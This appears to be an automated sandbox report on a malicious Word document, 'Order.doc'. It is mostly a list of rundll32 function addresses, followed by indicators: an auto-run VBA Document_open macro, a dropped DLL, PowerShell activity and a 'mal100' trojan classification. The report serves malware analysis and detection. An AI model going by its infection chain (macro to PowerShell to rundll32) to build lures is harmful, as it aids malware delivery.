Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00883F4F 8_2_00883F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0088135B 8_2_0088135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0087C364 8_2_0087C364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0088B165 8_2_0088B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0088A966 8_2_0088A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0087F369 8_2_0087F369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00873B74 8_2_00873B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00875B7D 8_2_00875B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00877378 8_2_00877378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00229C3D 8_2_00229C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00230604 8_2_00230604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00234012 8_2_00234012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022C017 8_2_0022C017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00239665 8_2_00239665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022E272 8_2_0022E272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00225478 8_2_00225478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00234478 8_2_00234478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023CC7F 8_2_0023CC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00229846 8_2_00229846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023BC4D 8_2_0023BC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022C851 8_2_0022C851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023CA55 8_2_0023CA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002292A3 8_2_002292A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023C4A5 8_2_0023C4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00226CA5 8_2_00226CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002228AA 8_2_002228AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00222EAC 8_2_00222EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002270AD 8_2_002270AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022B6B9 8_2_0022B6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002334BF 8_2_002334BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002390BE 8_2_002390BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00229A99 8_2_00229A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002230E8 8_2_002230E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002268EC 8_2_002268EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002250F1 8_2_002250F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002366FB 8_2_002366FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002300FE 8_2_002300FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002314FC 8_2_002314FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002334C3 8_2_002334C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002338C2 8_2_002338C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002308CF 8_2_002308CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00239EDA 8_2_00239EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022B8D8 8_2_0022B8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023A6D9 8_2_0023A6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022E8DD 8_2_0022E8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00223523 8_2_00223523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022A323 8_2_0022A323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00233D29 8_2_00233D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022EF2E 8_2_0022EF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022F52E 8_2_0022F52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022FF2C 8_2_0022FF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00239333 8_2_00239333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00237132 8_2_00237132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023D138 8_2_0023D138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023B706 8_2_0023B706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00224304 8_2_00224304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022B10A 8_2_0022B10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00232515 8_2_00232515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023891E 8_2_0023891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00225D63 8_2_00225D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023B165 8_2_0023B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00231372 8_2_00231372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00222B70 8_2_00222B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00220D7A 8_2_00220D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00232179 8_2_00232179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022177C 8_2_0022177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00224D48 8_2_00224D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00222353 8_2_00222353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022EB54 8_2_0022EB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023C15B 8_2_0023C15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00236158 8_2_00236158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023C5A1 8_2_0023C5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00237FA7 8_2_00237FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00231BA5 8_2_00231BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002341AB 8_2_002341AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00223DB8 8_2_00223DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022D5B8 8_2_0022D5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00221983 8_2_00221983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022DB86 8_2_0022DB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022598B 8_2_0022598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022498C 8_2_0022498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022F793 8_2_0022F793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022F797 8_2_0022F797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00229D95 8_2_00229D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023819F 8_2_0023819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022FBE6 8_2_0022FBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022B3E8 8_2_0022B3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002227F3 8_2_002227F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022D3F5 8_2_0022D3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_008A303C 8_2_008A303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_008B1E14 8_2_008B1E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EC017 9_2_001EC017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F4012 9_2_001F4012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F0604 9_2_001F0604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E9C3D 9_2_001E9C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FCA55 9_2_001FCA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EC851 9_2_001EC851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FBC4D 9_2_001FBC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E9846 9_2_001E9846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FCC7F 9_2_001FCC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E5478 9_2_001E5478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F4478 9_2_001F4478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EE272 9_2_001EE272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F9665 9_2_001F9665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E9A99 9_2_001E9A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F34BF 9_2_001F34BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F90BE 9_2_001F90BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EB6B9 9_2_001EB6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E2EAC 9_2_001E2EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E70AD 9_2_001E70AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E28AA 9_2_001E28AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC4A5 9_2_001FC4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E6CA5 9_2_001E6CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E92A3 9_2_001E92A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EE8DD 9_2_001EE8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F9EDA 9_2_001F9EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EB8D8 9_2_001EB8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FA6D9 9_2_001FA6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F08CF 9_2_001F08CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F34C3 9_2_001F34C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F38C2 9_2_001F38C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F00FE 9_2_001F00FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F14FC 9_2_001F14FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F66FB 9_2_001F66FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E50F1 9_2_001E50F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E68EC 9_2_001E68EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E30E8 9_2_001E30E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F891E 9_2_001F891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F2515 9_2_001F2515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EB10A 9_2_001EB10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FB706 9_2_001FB706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E4304 9_2_001E4304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FD138 9_2_001FD138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F9333 9_2_001F9333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F7132 9_2_001F7132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EEF2E 9_2_001EEF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EF52E 9_2_001EF52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EFF2C 9_2_001EFF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F3D29 9_2_001F3D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E3523 9_2_001E3523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EA323 9_2_001EA323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC15B 9_2_001FC15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F6158 9_2_001F6158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EEB54 9_2_001EEB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E2353 9_2_001E2353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E4D48 9_2_001E4D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E177C 9_2_001E177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E0D7A 9_2_001E0D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F2179 9_2_001F2179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F1372 9_2_001F1372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E2B70 9_2_001E2B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FB165 9_2_001FB165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E5D63 9_2_001E5D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F819F 9_2_001F819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EF797 9_2_001EF797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E9D95 9_2_001E9D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EF793 9_2_001EF793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E498C 9_2_001E498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E598B 9_2_001E598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EDB86 9_2_001EDB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E1983 9_2_001E1983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E3DB8 9_2_001E3DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001ED5B8 9_2_001ED5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F41AB 9_2_001F41AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F7FA7 9_2_001F7FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F1BA5 9_2_001F1BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC5A1 9_2_001FC5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001ED3F5 9_2_001ED3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E27F3 9_2_001E27F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EB3E8 9_2_001EB3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EFBE6 9_2_001EFBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0043303C 9_2_0043303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00441E14 9_2_00441E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028A821 10_2_0028A821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00286417 10_2_00286417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00284844 10_2_00284844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00295250 10_2_00295250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028CAA3 10_2_0028CAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029A0F1 10_2_0029A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028D2DD 10_2_0028D2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00285F04 10_2_00285F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029434E 10_2_0029434E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002947B5 10_2_002947B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00290B8A 10_2_00290B8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00284D90 10_2_00284D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029CBE7 10_2_0029CBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00298C2B 10_2_00298C2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029D02D 10_2_0029D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00290223 10_2_00290223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00292631 10_2_00292631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00298A33 10_2_00298A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00294C37 10_2_00294C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00282208 10_2_00282208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028240F 10_2_0028240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00292C05 10_2_00292C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00281806 10_2_00281806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00285418 10_2_00285418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028E612 10_2_0028E612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029AA7B 10_2_0029AA7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028327F 10_2_0028327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00290672 10_2_00290672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028BE74 10_2_0028BE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028E044 10_2_0028E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028DE81 10_2_0028DE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00294A9E 10_2_00294A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00291090 10_2_00291090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029D4E1 10_2_0029D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028ECFE 10_2_0028ECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028D6F0 10_2_0028D6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028A6C9 10_2_0028A6C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029C6D9 10_2_0029C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028A2D2 10_2_0028A2D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00289D2F 10_2_00289D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028A525 10_2_0028A525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00283938 10_2_00283938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00287B39 10_2_00287B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029CF31 10_2_0029CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00287731 10_2_00287731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00283336 10_2_00283336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029D70B 10_2_0029D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00294F04 10_2_00294F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00289106 10_2_00289106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028F369 10_2_0028F369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028C364 10_2_0028C364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029B165 10_2_0029B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029A966 10_2_0029A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00287378 10_2_00287378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00285B7D 10_2_00285B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00283B74 10_2_00283B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00299B4A 10_2_00299B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00293F4F 10_2_00293F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028C145 10_2_0028C145
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029135B 10_2_0029135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002993AA 10_2_002993AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00283FAF 10_2_00283FAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028ADAF 10_2_0028ADAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00292FA1 10_2_00292FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002909B8 10_2_002909B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028F9BA 10_2_0028F9BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028FFBA 10_2_0028FFBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00299DBF 10_2_00299DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00297BBE 10_2_00297BBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00291F88 10_2_00291F88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00297187 10_2_00297187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00293590 10_2_00293590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029C192 10_2_0029C192
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028BB96 10_2_0028BB96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002867EF 10_2_002867EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028F5E0 10_2_0028F5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00296BE4 10_2_00296BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002835FC 10_2_002835FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00287FFE 10_2_00287FFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00291DFE 10_2_00291DFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029BBF1 10_2_0029BBF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029DBC4 10_2_0029DBC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00282DDF 10_2_00282DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002857D4 10_2_002857D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00209C3D 10_2_00209C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00210604 10_2_00210604
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Order.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Ynzysnuyyfihfq23d, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Order.doc OLE indicator, VBA macros: true
PE file contains strange resources
Source: J47K.dll.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@20/8@2/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$Order.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBF29.tmp Jump to behavior
Source: Order.doc OLE indicator, Word Document stream: true
Source: Order.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ........................................ .?.......?...............&.....X.&.............#...............................h.......5kU.......&..... Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ................|...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........&.....L.................&..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&L.j......................#.............}..v....x.......0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&L.j..... #...............#.............}..v............0.N...............`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................M.j......................#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................M.j......`...............#.............}..v....h.......0.N...............`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............VM.j......................#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............VM.j..... #...............#.............}..v............0.N.............h.`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j.....J`...............#.............}..v....01......0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j.....1................#.............}..v....h2......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j.....J`...............#.............}..v....09......0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j.....9................#.............}..v....h:......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.....J`...............#.............}..v....0A......0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.....A................#.............}..v....hB......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.....F......0.N.............8G`.....(.......|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j....8G................#.............}..v.....G......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.4.............}..v.....K......0.N.............8G`.....$.......|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j.....L................#.............}..v.....M......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j.....J`...............#.............}..v.....S......0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j.....T................#.............}..v.....U......0.N..............G`.............|............... Jump to behavior
